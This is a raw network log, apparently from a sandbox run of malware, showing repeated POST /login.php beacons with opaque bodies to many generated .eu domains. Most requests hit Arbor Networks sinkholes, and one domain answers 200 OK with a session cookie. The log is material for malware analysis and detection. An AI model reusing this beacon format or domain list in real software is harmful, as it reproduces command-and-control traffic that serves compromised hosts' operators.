Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:31 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 02 Sep 2016 17:41:54 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 02 Sep 2016 17:41:54 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 02 Sep 2016 17:41:54 GMT..Server: Apache/2.2.22 (Debian)..Vary: Accept-Encoding..Content-Length: 287..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:45 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=25d7c5d399560c85bd203fa61188924f; Expires=Fri, 01 Sep 2023 17:42:02 GMT
Date: Fri, 02 Sep 2016 17:42:02 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 02 Sep 2016 17:50:46 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 02 Sep 2016 17:50:46 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Fri, 02 Sep 2016 17:50:46 GMT..Content-Type: text/html..Content-Length: 579..Connection: keep-alive..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:05 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:48 GMT
